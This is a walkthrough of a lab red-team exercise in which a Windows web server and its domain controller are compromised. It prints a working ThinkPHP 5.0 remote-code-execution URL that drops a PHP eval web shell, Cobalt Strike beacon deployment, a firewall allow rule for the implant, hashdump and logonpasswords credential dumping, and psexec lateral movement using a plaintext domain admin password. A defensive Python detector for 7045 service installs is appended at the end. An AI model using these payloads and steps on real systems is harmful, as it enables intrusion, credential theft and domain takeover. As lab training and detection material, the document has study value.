Red Team Target Machine 5: Practice Walkthrough

Lab information:

Attack machine: Kali
ip: 192.168.0.153
Target: web server
NIC 1: 192.168.0.162
NIC 2: 192.168.138.136
Target: domain controller
ip: 192.168.138.138

Compared with Red Team Target Machine 1 this one felt much simpler, probably because the routine is the same and I had already been through it once.

Pre-exploitation
netdiscover -r 192.168.0.0/24  // discover live hosts

192.168.0.162 is the target machine's IP.

nmap -A -sV -sT 192.168.0.162  // port-scan the target to see which services are open
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-27 21:31 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.0.162
Host is up (0.0098s latency).
Not shown: 992 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.5.38)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.5.38
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: SUN)
3306/tcp open mysql MySQL (unauthorized)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:0C:29:B9:F4:45 (VMware)
Device type: general purpose|media device
Running: Microsoft Windows 2008|10|7|8.1, Microsoft embedded
OS CPE: cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_10 cpe:/h:microsoft:xbox_one cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows Server 2008 SP2, Microsoft Windows Server 2008 SP2 or Windows 10 or Xbox One, Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop
Service Info: Host: WIN7; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: WIN7, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:b9:f4:45 (VMware)
|_clock-skew: mean: -2h40m00s, deviation: 4h37m07s, median: -1s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: win7
| NetBIOS computer name: WIN7\x00
| Domain name: sun.com
| Forest name: sun.com
| FQDN: win7.sun.com
|_ System time: 2021-12-27T21:32:33+08:00
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-12-27T13:32:33
|_ start_date: 2021-12-24T10:19:01

TRACEROUTE
HOP RTT ADDRESS
1 9.84 ms 192.168.0.162

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.16 seconds

Port 3306 is normally the MySQL service port.

Try connecting to it remotely:

mysql -h192.168.0.162 -uroot -p

But the target's database appears to have remote connections disabled.

The scan above also shows port 80 (HTTP) open on the target, so visit it in a browser.

It is a ThinkPHP site; the version can be read from an error page.

It turns out to be ThinkPHP V5.0.22.

There are plenty of PoCs online; pick one and try it. ThinkPHP 5.0 arbitrary code execution: https://www.cnblogs.com/backlion/p/10106676.html

Payload:

http://192.168.0.162/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST[cmd]);?^>>shell.php

Connect to it with AntSword.

Connection successful.

Check the current privileges from AntSword's virtual terminal:

whoami

We already have administrator privileges.

ipconfig /all  // check whether the host is in a domain

There is a domain named sun.

tasklist  // check for antivirus software

There is no antivirus software.

Next, generate a payload with Cobalt Strike (CS) to bring the target online in CS for post-exploitation.

Post-exploitation
./teamserver 192.168.0.153 123456  // start the CS team server

Connect with the client.

Start a listener and generate the payload muma.exe.

Upload it to the target's directory via AntSword.

netsh advfirewall firewall add rule name="muma.exe" dir=in action=allow program="C:\phpStudy\WWW\muma.exe" enable=yes  // add an inbound firewall allow rule for the program

Run the payload:

muma.exe

The beacon checks in successfully.

beacon> shell net time /domain  // find the domain controller

Ping the DC's hostname to find its IP address:

beacon> shell ping DC.sun.com
[*] Tasked beacon to run: ping DC.sun.com
[+] host called home, sent: 106 bytes
[+] received output:

正在 Ping DC.sun.com [192.168.138.138] 具有 32 字节的数据:

beacon> net view  // list hosts in the domain

beacon> hashdump
beacon> logonpasswords  // dump the credentials on this machine

With the target's password in hand, use the psexec module in CS directly for a pass-the-ticket attack.

First start an SMB listener.

Run psexec against the domain controller.

The same attack can also be carried out from the command line:

beacon> rev2self
beacon> make_token SUN\Administrator hongrisec@2019
beacon> jump psexec DC 域控
[+] host called home, sent: 58 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[*] Tasked beacon to run windows/beacon_bind_pipe (\\.\pipe\msagent_2835) on DC via Service Control Manager (\\DC\ADMIN$\79a9e06.exe)
[+] host called home, sent: 285790 bytes
[+] received output:
Started service 79a9e06 on DC
[+] host called home, sent: 74 bytes
[+] established link to child beacon: 192.168.138.138

Finally the domain controller also comes online.
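Added here as the defender's counterpart to the psexec step above (example code, not part of the original walkthrough): a small Python check over constructed Windows System-log 7045 service-install records that flags the artifacts this technique leaves behind, namely the 7-hex-character service and binary name and an image path under the ADMIN$ share. Field names mirror the 7045 event; the sample records and hostnames are constructed from what this page shows.

```python
import re

# Constructed sample records modelled on Windows System log event 7045
# ("A service was installed in the system"); values mirror this page's output.
SAMPLE_EVENTS = [
    {"EventID": 7045, "Computer": "DC.sun.com", "ServiceName": "79a9e06",
     "ImagePath": r"\\DC\ADMIN$\79a9e06.exe", "StartType": "demand start"},
    {"EventID": 7045, "Computer": "DC.sun.com", "ServiceName": "wuauserv",
     "ImagePath": r"C:\Windows\system32\svchost.exe -k netsvcs",
     "StartType": "auto start"},
    {"EventID": 7045, "Computer": "win7.sun.com", "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe", "StartType": "demand start"},
    {"EventID": 4624, "Computer": "DC.sun.com"},  # not a service install
]

# Cobalt Strike's default psexec service/binary name is 7 hex characters.
RANDOM_HEX_NAME = re.compile(r"^[0-9a-f]{7}$")
# Binaries written through an admin share or straight into %SystemRoot%.
ADMIN_SHARE_PATH = re.compile(r"^\\\\[^\\]+\\ADMIN\$\\([^\\]+)\.exe$", re.I)
SYSTEMROOT_PATH = re.compile(r"^%SystemRoot%\\([^\\]+)\.exe$", re.I)


def classify_service_install(event):
    """Return the reasons a 7045 record looks like service-based lateral movement."""
    if event.get("EventID") != 7045:
        return []
    reasons = []
    name = event.get("ServiceName", "")
    path = event.get("ImagePath", "")
    if RANDOM_HEX_NAME.match(name.lower()):
        reasons.append("service name is 7 random hex chars (CS psexec default)")
    m = ADMIN_SHARE_PATH.match(path) or SYSTEMROOT_PATH.match(path)
    if m:
        reasons.append("binary installed via ADMIN$ share or %SystemRoot%")
        if RANDOM_HEX_NAME.match(m.group(1).lower()):
            reasons.append("binary name matches the random service name")
    if name.upper() == "PSEXESVC" or path.upper().endswith("PSEXESVC.EXE"):
        reasons.append("Sysinternals PsExec service")
    if reasons and event.get("StartType", "").lower() == "demand start":
        reasons.append("demand-start service, typical of one-shot remote exec")
    return reasons


def find_suspicious(events):
    """Collect (computer, service name, reasons) for every flagged record."""
    hits = []
    for ev in events:
        reasons = classify_service_install(ev)
        if reasons:
            hits.append((ev["Computer"], ev.get("ServiceName"), reasons))
    return hits
```

Forwarding 7045 from domain controllers to a SIEM and alerting on the first two heuristics catches the exact sequence shown in the beacon output above, since the service name and the dropped binary name are the same random value.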

Challenge complete!